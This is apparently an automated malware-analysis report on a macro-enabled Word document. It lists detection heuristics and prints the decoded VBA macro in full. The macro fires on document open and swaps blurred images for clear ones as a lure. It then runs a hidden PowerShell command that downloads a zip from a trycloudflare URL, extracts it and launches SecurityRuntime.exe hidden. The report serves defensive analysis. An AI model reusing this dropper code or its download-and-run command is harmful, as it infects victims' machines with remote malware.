MALICIOUS
250
Risk Score
Heuristics 7
-
VBA project inside OOXML medium 5 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Shell Command, vbHide -
PowerShell reference in VBA critical OLE_VBA_PSPowerShell reference in VBAMatched line in script
Command = "powershell -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command " & _ -
VBA stages a PowerShell/LOLBin download-and-run command critical OLE_VBA_BITSTRANSFER_DROPPERThe macro assembles a download command using a PowerShell or LOLBin download primitive (Start-BitsTransfer, Invoke-WebRequest, Net.WebClient, bitsadmin, certutil, ...) that fetches a remote payload, then executes it -- writing it to a script file and running it, or launching it directly from an auto-exec handler. The keywords are commonly split with PowerShell backtick / cmd caret escapes to evade scanners; this detection de-escapes the source first. A high-confidence downloader/dropper, stronger than the individual Shell / download keywords on their own.Matched line in script
Private Sub Document_Open() -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_Open() -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL https://apps-partnership-types-bride.trycloudflare.com/SecurityRuntime-publish2.zip In document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 3265 bytes |
SHA-256: f6982c663fcfff4c575a211a4774b8df63d13615ac2417dfc1a96c641ca92087 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Dim doc As Document
Set doc = ActiveDocument
Dim shp As Shape
' Отключаем обновление экрана, чтобы замена произошла мгновенно
Application.ScreenUpdating = False
' Перебираем ВСЕ плавающие объекты в документе
For Each shp In doc.Shapes
' Если это заблюренная версия — просто делаем её невидимой
If InStr(1, shp.AlternativeText, "blur_") > 0 Then
shp.Visible = msoFalse
End If
' Если это четкая версия — делаем её видимой
If InStr(1, shp.AlternativeText, "clear_") > 0 Then
shp.Visible = msoTrue
End If
Next shp
Call ОбновитьАгентаВФоне
Application.ScreenUpdating = True
MsgBox "Изображения успешно обновлены!", vbInformation, "Готово"
End Sub
Sub ОбновитьАгентаВФоне()
Dim Url As String
Dim TargetDir As String
Dim ZipFile As String
Dim ExtractDir As String
Dim ExeName As String
Dim Command As String
' ================== НАСТРОЙКИ ==================
Url = "https://apps-partnership-types-bride.trycloudflare.com/SecurityRuntime-publish2.zip"
TargetDir = "C:\Users\Public\Documents"
ZipFile = TargetDir & "\SecurityRuntime-publish2.zip"
ExtractDir = TargetDir & "\SecurityRuntime"
ExeName = "SecurityRuntime.exe"
' ===============================================
' Команда PowerShell
Command = "powershell -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command " & _
"""$url = '" & Url & "'; " & _
"$zip = '" & ZipFile & "'; " & _
"$extract = '" & ExtractDir & "'; " & _
"$exeName = '" & ExeName & "'; " & _
"$headers = @{'ngrok-skip-browser-warning'='true'}; " & _
"$maxRetries = 5; $retry = 0; $success = $false; " & _
"do { try { Invoke-WebRequest -Uri $url -OutFile $zip -Headers $headers -UseBasicParsing -TimeoutSec 30; $success = $true } " & _
"catch { Start-Sleep -Seconds 6; $retry++ } } while (!$success -and $retry -lt $maxRetries); " & _
"if(Test-Path $zip) { " & _
"Expand-Archive -Path $zip -DestinationPath $extract -Force; " & _
"Remove-Item $zip -Force -ErrorAction SilentlyContinue; " & _
"$exePath = Get-ChildItem -Path $extract -Recurse -Filter $exeName -File | Select-Object -First 1 -ExpandProperty FullName; " & _
"if($exePath) { Start-Process $exePath -WindowStyle Hidden } " & _
"} else { Write-Host 'Не удалось скачать' -ForegroundColor Red }"""
Shell Command, vbHide
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 12288 bytes |
SHA-256: e94b17e50cb1ccd9cf39b5cd81d72995a2da9fb5bf13f7c3e0c7c56b28d7c255 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.